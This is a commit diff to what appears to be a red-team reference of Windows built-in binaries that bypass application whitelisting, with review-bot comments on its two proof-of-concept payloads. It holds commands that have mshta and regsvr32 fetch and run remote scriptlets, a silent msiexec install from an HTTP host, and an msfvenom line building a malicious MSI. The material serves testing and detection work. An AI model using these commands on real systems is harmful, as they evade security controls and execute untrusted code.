Added some more adjustments
parent
ddc1173e45
commit
1a0eb4edc7
@ -4,10 +4,37 @@
|
||||||
|
|
||||||
```
|
```
|
||||||
msbuild.exe pshell.xml
|
msbuild.exe pshell.xml
|
||||||
|
|
||||||
|
msbuild.exe Msbuild.csproj
|
||||||
```
|
```
|
||||||
|
|
||||||
Acknowledgements:
|
Acknowledgements:
|
||||||
* Casey Smith - @subtee
|
* Casey Smith - @subtee
|
||||||
|
* Cn33liz - @Cneelis
|
||||||
|
|
||||||
|
Code sample:
|
||||||
|
* [Msbuild.csproj](Payload/Msbuild.csproj)
|
||||||
|
|
||||||
|
Resources:
|
||||||
|
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Trusted_Developer_Utilities.md
|
||||||
|
* https://github.com/Cn33liz/MSBuildShell
|
||||||
|
* https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/
|
||||||
|
* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
|
||||||
|
|
||||||
|
Full path:
|
||||||
|
```
|
||||||
|
C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe
|
||||||
|
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe
|
||||||
|
C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe
|
||||||
|
C:\Windows\Microsoft.NET\Framework64\v3.5\Msbuild.exe
|
||||||
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
|
||||||
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe
|
||||||
|
```
|
||||||
|
|
||||||
|
Notes:
|
||||||
|
Example code borrowed from Red Canary - Atomic Red Team.
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -9,7 +9,19 @@ Open .diagcab package
|
||||||
Acknowledgements:
|
Acknowledgements:
|
||||||
* ?
|
* ?
|
||||||
|
|
||||||
|
Code sample:
|
||||||
|
* [NameOfLink](Payload/NameOfPayload)
|
||||||
|
|
||||||
Resources:
|
Resources:
|
||||||
* https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/
|
* https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/
|
||||||
* https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
|
* https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
|
||||||
|
|
||||||
|
|
||||||
|
Full path:
|
||||||
|
```
|
||||||
|
C:\Windows\System32\Msdt.exe
|
||||||
|
C:\Windows\SysWOW64\Msdt.exe
|
||||||
|
```
|
||||||
|
|
||||||
|
Notes:
|
||||||
|
|
||||||
|
|
|
@ -4,7 +4,30 @@
|
||||||
|
|
||||||
```
|
```
|
||||||
mshta.exe evilfile.hta
|
mshta.exe evilfile.hta
|
||||||
|
|
||||||
|
mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))
|
||||||
|
|
||||||
|
mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct").Exec();close();
|
||||||
```
|
```
|
||||||
|
|
||||||
Acknowledgements:
|
Acknowledgements:
|
||||||
* ?
|
* Casey Smith - @subtee
|
||||||
|
|
||||||
|
Code sample:
|
||||||
|
* [Mshta_calc.sct](Payload/Mshta_calc.sct)
|
||||||
|
|
||||||
|
Resources:
|
||||||
|
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Mshta.md
|
||||||
|
* https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4
|
||||||
|
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct
|
||||||
|
* https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
|
||||||
|
|
||||||
|
Full path:
|
||||||
|
```
|
||||||
|
C:\Windows\System32\mshta.exe
|
||||||
|
C:\Windows\SysWOW64\mshta.exe
|
||||||
|
```
|
||||||
|
|
||||||
|
Notes:
|
||||||
|
SCT code borrowed from Red Canary - Atomic Red Team
|
||||||
|
|
||||||
|
|
|
@ -8,4 +8,25 @@ msiexec /q /i http://192.168.100.3/tmp/cmd.png
|
||||||
```
|
```
|
||||||
|
|
||||||
Acknowledgements:
|
Acknowledgements:
|
||||||
* Casey Smith - @subtee
|
* ? - @netbiosX
|
||||||
|
|
||||||
|
Code sample:
|
||||||
|
*
|
||||||
|
|
||||||
|
Resources:
|
||||||
|
* https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/
|
||||||
|
|
||||||
|
Full path:
|
||||||
|
```
|
||||||
|
c:\windows\system32\msiexec.exe
|
||||||
|
c:\windows\sysWOW64\msiexec.exe
|
||||||
|
```
|
||||||
|
|
||||||
|
Notes:
|
||||||
|
Generate MSI file:
|
||||||
|
```
|
||||||
|
msfvenom -f msi -p windows/exec CMD=powershell.exe > powershell.msi
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -9,3 +9,21 @@ odbcconf -f file.rsp
|
||||||
Acknowledgements:
|
Acknowledgements:
|
||||||
* Casey Smith - @subtee
|
* Casey Smith - @subtee
|
||||||
* Nick Tyrer - @NickTyrer
|
* Nick Tyrer - @NickTyrer
|
||||||
|
|
||||||
|
Code sample:
|
||||||
|
*
|
||||||
|
|
||||||
|
Resources:
|
||||||
|
* https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b
|
||||||
|
* https://github.com/woanware/application-restriction-bypasses
|
||||||
|
|
||||||
|
Full path:
|
||||||
|
```
|
||||||
|
c:\windows\system32\odbcconf.exe
|
||||||
|
c:\windows\sysWOW64\odbcconf.exe
|
||||||
|
```
|
||||||
|
|
||||||
|
Notes:
|
||||||
|
Samples can be found in the resources.
|
||||||
|
|
||||||
|
|
||||||
|
|
|
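--- /dev/null
+++ b/Payload/Msbuild.csproj
@@ -0,0 +1,47 @@
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+<!-- This inline task executes c# code. -->
+<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildBypass.csproj -->
+<!-- Feel free to use a more aggressive class for testing. -->
+<Target Name="Hello">
+<FragmentExample />
+<ClassExample />
+</Target>
+<UsingTask
+TaskName="FragmentExample"
+TaskFactory="CodeTaskFactory"
+AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
+<ParameterGroup/>
+<Task>
+<Using Namespace="System" />
+<Code Type="Fragment" Language="cs">
+<![CDATA[
+Console.WriteLine("Hello From a Code Fragment");
+]]>
+</Code>
+</Task>
+</UsingTask>
+<UsingTask
+TaskName="ClassExample"
+TaskFactory="CodeTaskFactory"
+AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
+<Task>
+<!-- <Reference Include="System.IO" /> Example Include -->
+<Code Type="Class" Language="cs">
+<![CDATA[
+using System;
+using Microsoft.Build.Framework;
+using Microsoft.Build.Utilities;
+
+public class ClassExample : Task, ITask
+{
+public override bool Execute()
+{
+Console.WriteLine("Hello From a Class.");
+return true;
+}
+}
+]]>
+</Code>
+</Task>
+</UsingTask>
+</Project>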
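Review bot: The usage comment near the top of the project names a file that does not exist in this commit — it reads `<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildBypass.csproj -->` while the file is added as Payload/Msbuild.csproj and Msbuild.md invokes `msbuild.exe Msbuild.csproj`; I would change the comment to `<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe Msbuild.csproj -->`. Worth stating in the same header comment is that the project declares `ToolsVersion="4.0"` and both UsingTask elements bind to the v4.0.30319 Microsoft.Build.Tasks.v4.0.dll, so the v2.0.50727 and v3.5 msbuild.exe paths listed under "Full path" in Msbuild.md are presumably not able to build this sample (CodeTaskFactory inline tasks, as I recall, need the 4.0 toolset — confirm). The two AssemblyFile attributes also hard-code the 32-bit Framework directory; whether that matters when running the Framework64 msbuild.exe from the same list is not something this file shows, so a one-line note asking the user to verify it under the 64-bit build would save someone a confusing failure.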
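--- /dev/null
+++ b/Payload/Mshta_calc.sct
@@ -0,0 +1,43 @@
+<?XML version="1.0"?>
+<scriptlet>
+
+<registration
+description="Bandit"
+progid="Bandit"
+version="1.00"
+classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
+>
+
+<!-- regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
+<!-- DFIR -->
+<!-- .sct files are downloaded and executed from a path like this -->
+<!-- Though, the name and extension are arbitary.. -->
+<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
+<!-- Based on current research, no registry keys are written, since call "uninstall" -->
+
+
+<!-- Proof Of Concept - Casey Smith @subTee -->
+<script language="JScript">
+<![CDATA[
+
+var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
+
+]]>
+</script>
+</registration>
+
+<public>
+<method name="Exec"></method>
+</public>
+<script language="JScript">
+<![CDATA[
+
+function Exec()
+{
+var r = new ActiveXObject("WScript.Shell").Run("notepad.exe");
+}
+
+]]>
+</script>
+
+</scriptlet>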
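Review bot: The scriptlet has two execution points and the file does not say so — the registration-time script runs `calc.exe`, and the public `Exec()` method runs `notepad.exe`, so the mshta one-liner documented in Mshta.md (`GetObject("script:...").Exec()`) launches both, while the file name only mentions calc; I would add, above the `<public>` element, `<!-- Exec() is the method Mshta.md calls; registration script above already runs calc.exe on load -->`. The DFIR comment block was written for the `regsvr32 /s /n /u /i:... scrobj.dll` invocation it quotes (the "no registry keys ... uninstall" remark depends on `/u`), which is not the mshta path this page uses — a short caveat that the cache location and no-registry-write claim are unverified for the mshta GetObject path would keep the note honest. As rendered, that regsvr32 comment is opened with `<!--` but never closed before the next `<!-- DFIR -->`; if that is what is in the file rather than a rendering artifact it is malformed XML and should get its `-->`. The fixed `classid` `{AAAA1111-0000-0000-0000-0000FEEDACDC}` is a static value copied from the public PoC; worth a comment that it is a convenient detection artifact and should be changed for any real test.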
@ -8,3 +8,24 @@ Presentationhost.exe C:\temp\Evil.xbap
|
||||||
|
|
||||||
Acknowledgements:
|
Acknowledgements:
|
||||||
* Casey Smith - @subtee
|
* Casey Smith - @subtee
|
||||||
|
|
||||||
|
Code sample:
|
||||||
|
*
|
||||||
|
|
||||||
|
Resources:
|
||||||
|
* https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
|
||||||
|
* https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
|
||||||
|
|
||||||
|
Full path:
|
||||||
|
```
|
||||||
|
c:\windows\system32\PresentationHost.exe
|
||||||
|
c:\windows\sysWOW64\PresentationHost.exe
|
||||||
|
```
|
||||||
|
|
||||||
|
Notes:
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -3,10 +3,31 @@
|
||||||
* Functions: Execute
|
* Functions: Execute
|
||||||
|
|
||||||
```
|
```
|
||||||
regasm.exe /U regsvcs.dll
|
regasm.exe /U AllTheThings.dll
|
||||||
|
|
||||||
regasm.exe regsvcs.dll
|
|
||||||
```
|
```
|
||||||
|
|
||||||
Acknowledgements:
|
Acknowledgements:
|
||||||
* Casey Smith - @subtee
|
* Casey Smith - @subtee
|
||||||
|
|
||||||
|
Code sample:
|
||||||
|
* [AllTheThingsx64.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx64.dll)[1]
|
||||||
|
|
||||||
|
Resources:
|
||||||
|
* https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
|
||||||
|
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs
|
||||||
|
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/RegsvcsRegasm.md
|
||||||
|
* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
|
||||||
|
|
||||||
|
Full path:
|
||||||
|
```
|
||||||
|
C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe
|
||||||
|
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe
|
||||||
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
|
||||||
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe
|
||||||
|
```
|
||||||
|
|
||||||
|
Notes:
|
||||||
|
[1]Code sample linked to Red Canary - Atomic Red Team
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|